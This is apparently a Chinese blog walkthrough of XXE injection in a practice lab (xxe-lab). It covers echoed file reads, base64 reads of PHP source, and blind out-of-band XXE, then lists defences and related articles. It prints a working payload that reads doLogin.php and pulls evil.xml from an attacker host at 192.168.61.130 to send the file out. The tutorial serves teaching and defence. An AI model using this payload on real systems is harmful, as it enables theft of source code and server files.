XXE漏洞【回显读取文件和无回显读取文件】

最新推荐文章于 2024-04-01 14:03:00 发布
最新推荐文章于 2024-04-01 14:03:00 发布
阅读量2.2k 收藏 4
点赞数
原文链接:https://blog.csdn.net/nzjdsds/article/details/98763063
版权
积累 同时被 3 个专栏收录
55 篇文章 1 订阅
订阅专栏
web安全
48 篇文章 3 订阅
订阅专栏
xxe
6 篇文章 3 订阅
订阅专栏

(若出现排版,乱码等问题请看有道文档)

文档:XXE漏洞【回显读取文件和无回显读取文?..
链接:http://note.youdao.com/noteshare?id=b41700dbd75216812521ad5179e7291b&sub=12F412E07EDC4BDA9C5ABEF0CAD48CB7

 

 

靶场环境

XXE靶场源码:https://github.com/c0ny1/xxe-lab

phpstudy

文件读取

 

靶场打开后界面如下:

用BURP抓包

从数据包中可以看到,数据是利用XML进行传输

把包发送出去

可以看到响应包的内容为usrename

那我们可以使用XML DTD 进行文件读取

我们现在C盘创建一个test.txt

我们把请求包的XML内容进行更改,尝试读取C盘下的test.txt文件

接下来我们尝试读取PHP文件,因为PHP的代码可能因为浏览器会解析的原因导致无法显示

这里我们就需要进行base64编码来显示

解码后即是PHP代码的内容

这是有回显的XXEZ注入。

我们编辑下源码,把报错和结果输出都禁止掉

然后我们再次进行注入尝试就不会得到结果

这个时候我们就要进行参数实体的注入

我们先在kail(192.168.61.130)上开启apache服务

<?xml version="1.0"?> <!DOCTYPE test[ <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=C:/phpStudy/PHPTutorial/WWW/php_xxe/doLogin.php"> <!ENTITY % dtd SYSTEM "http://192.168.61.130/evil.xml"> %dtd; %send; ]>

% 表示参数实体

第3句代码意思:定义参数实体file   SYSTEM表示参数实体引用外部实体内容  内容为“php://filter/read=convert.base64-encode/resource=C:/phpStudy/PHPTutorial/WWW/php_xxe/doLogin.php”

第4句代码意思:定义参数实体dtd 内容为    http://192.168.61.130/evil.xml 里面的内容

第5句代码意思:执行%dtd的代码

第6句代码意思:执行%send代码

evil.xml

然后我们监控下apache的访问日志

然后我们发包

然后我们就能看到apache的访问请求,content参数的内容即为编码后的doLogin.php的代码

 

XML可用的外部实体类型

 

 

防御方法

1、使用开发语言提供的禁用外部实体的方法

PHP

libxml_disable_entity_loader(true);

python

from lxml import etree xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

2、过滤用户提交的XML数据

<!DOCTYPE  <!ENTITY SYSTEM PUBLIC

参考资料

1. XXE漏洞以及Blind XXE总结:https://blog.csdn.net/u011721501/article/details/43775691

 

bylfsj
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
第四节 XXE漏洞利用 - 任意文件读取-01
09-15
第四节 XXE漏洞利用 - 任意文件读取-01
WEB攻防-通用漏洞&XML&XXE&无回显&DTD实体&伪协议&代码审计
m0_65336233的博客
10-15 711
WEB攻防-通用漏洞&XML&XXE&无回显&DTD实体&伪协议&代码审计
利用 DNSLog回显注入
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
07-18 544
基本上,DNSLog服务提供了一个自定义的DNS服务器,将请求保存在日志中,并为每个请求生成一个唯一的域名。无回显注入是指在注入点无法直接获取响应的情况下,通过DNSLog获取注入结果的一种注入方式。无回显注入的原理是将注入结果作为DNS请求的一部分,通过DNSLog获取DNS请求的响应,从而获取注入结果。构造注入payload:根据目标应用程序的注入点,构造用于触发DNS请求的注入payload。通常,注入点位于应用程序的输入字段中。触发注入:向应用程序提交经过注入负载处理的请求,以触发注入攻击。
Day60:WEB攻防-XML&XXE安全&无回显方案&OOB盲注&DTD外部实体&黑白盒挖掘
最新发布
qq_61553520的博客
04-01 1336
小迪安全-Day60:WEB攻防-XML&XXE安全&无回显方案&OOB盲注&DTD外部实体&黑白盒挖掘
渗透无回显,放弃 or 看这篇文章
大河之犬的博客
05-15 729
通俗的说就是我有个已注册的域名a.com,我在域名代理商那里将域名设置对应的ip 1.1.1.1 上,这样当我向dns服务器发起a.com的解析请求时,DNSlog中会记录下他给a.com解析,解析值为1.1.1.1,而我们这个解析的记录的值就是我们要利用的地方。DNSlog就是存储在DNS服务器上的域名信息,它记录着用户对域名www.baidu.com等的访问信息,类似日志文件。打开新网页并粘贴在url上,访问这个三级域名。ceye使用方法类似。
XXE漏洞复现实操
wutiangui的博客
10-13 781
(1)XXE漏洞全称XML External Entity Injection,即xmI外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害,XML(也是一种语言)被设计用来传输和存储数据。(2)也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致漏洞。如果能够建立连接,那么服务器端的ncat会收到相应的请求信息。
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
内含xxe漏洞原理,以及该漏洞的多种利用方式,同时根据八个具体案例详细描述漏洞利用方式。 【想要搭建vulnhub内靶场可关注博主,然后私聊我哦】 同时内含vulnhub中xxe lab:1靶场的过关记录 渗透思路: 由于网站...
5、XXE漏洞pdf资料
10-15
5、XXE漏洞
DNSlog回显注入及其原理
sweelg的博客
07-18 547
原理 DNS的解析是递归与迭代相结合的,下面给出了当我们访问www.cloudcrowd.com.cn时,DNS的解析过程示意图。 其中,红色部分是可控的。我们只需要搭建一个红色部分的DNS服务器,并将要盲打或盲注的回显,放到自己域名的二级甚至三级域名上去请求,就可以通过DNS解析日志来获取到它们。 具体使用详情参考: https://blog.csdn.net/qq_35569814/article/details/100348097 https://www.cnblogs.com/a.
Web漏洞-XXE漏洞(详细)
Ays.Ie的博客
03-11 4469
该篇描述Web漏洞-XXE漏洞(详细)
XXE漏洞安全-全网最详细讲解】
LCW991207的博客
08-04 1925
XXE(XML External Entity)漏洞是一种安全漏洞,出现在使用XML解析器的应用程序中。它允许攻击者利用可信任的XML扩展功能来执行恶意操作,如读取本地文件、发起远程网络请求或执行任意命令。XXE漏洞的发生通常是由于应用程序在解析XML输入时未正确验证或限制实体引用。攻击者可以通过构造恶意的XML输入,将外部实体(external entity)引用进来,然后利用这些实体来获取敏感信息或进行其他攻击。
XXE漏洞详解与利用
qq_56438857的博客
08-11 7212
XML(Extensible Markup Language)意为可扩展性标记语言,我将介绍下 XML 的一些基础知识,方便你更好地理解漏洞原理。
XXE漏洞简介
不怕死的假老练
09-05 2440
一、概述 XXE(XML External Entity Injection),即MXL外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站,发起dos攻击。 XXE漏洞触发的点出现在系统可以上传XML文件的位置,应用程序对XML输入进行解析时,没有对上传的XML文件内容进行过滤,没有禁止加载外部实体,导致攻击者可以构造一个恶意的XML文件进行上传。 二、基本概念 1.XML XML,即可扩展
XXE漏洞
huangyongkang666的博客
03-29 2293
XXE漏洞 1.漏洞简介 ​ XXE 漏洞全称XML External Entity Injection,即 XML 外部实体注入漏洞XXE 漏洞发生在应用程序解析 XML 输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。 xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意 xml文件。 2.XML简介 ​ XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一
XXE漏洞详解
xcxhzjl的博客
11-18 2773
目录 一、XML基础 二、实体的分类 1、命名实体 2、字符实体 3、参数实体 4、外部实体 三、XXE漏洞 1、XXE漏洞发生在哪里 2、怎么判断网站存在XXE漏洞 3、XXE漏洞的危害 4、怎样构建XXE漏洞 5、XXE漏洞的防御 参考资料 XXE漏洞即外部实体注入攻击(XML External Entity)。 一、XML基础 XML(eXtensible Markup Language)是一种结构性标记语言,在格式上类似于HTML。可用来标记数据,定义...
XXE漏洞详解(全网最详细)
qq_61553520的博客
05-09 2833
XXE:全称为XML Enternal Entity Injection,中文名称:XML外部实体注入。
利用XXE漏洞读取PHP文件内容攻击如何防范
06-08
针对利用XXE漏洞读取PHP文件内容的攻击,可以采取以下措施: 1. 避免使用外部实体。禁用或限制XML解析器的外部实体,以防止攻击者利用外部实体注入恶意代码。 2. 使用白名单机制。限制XML解析器只能访问预先定义的实体,禁止访问不受信任的实体。 3. 过滤输入。在接收到XML数据之前,对输入数据进行过滤,以删除或转义可能包含恶意代码的字符。 4. 更新XML解析器。使用最新版本的XML解析器,因为较新版本通常包含针对XXE攻击的修复程序。 5. 禁止远程文件访问。禁止XML解析器访问远程文件,以防止攻击者利用XXE漏洞读取PHP文件内容等敏感信息。 6. 隔离PHP文件。将PHP文件与其他文件隔离开来,以确保攻击者无法利用XXE漏洞读取PHP文件内容。 以上措施可以帮助防止利用XXE漏洞读取PHP文件内容的攻击,保护系统的安全。但是,最好的方法是使用安全的编程实践和审查代码,以防止XXE漏洞的出现。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值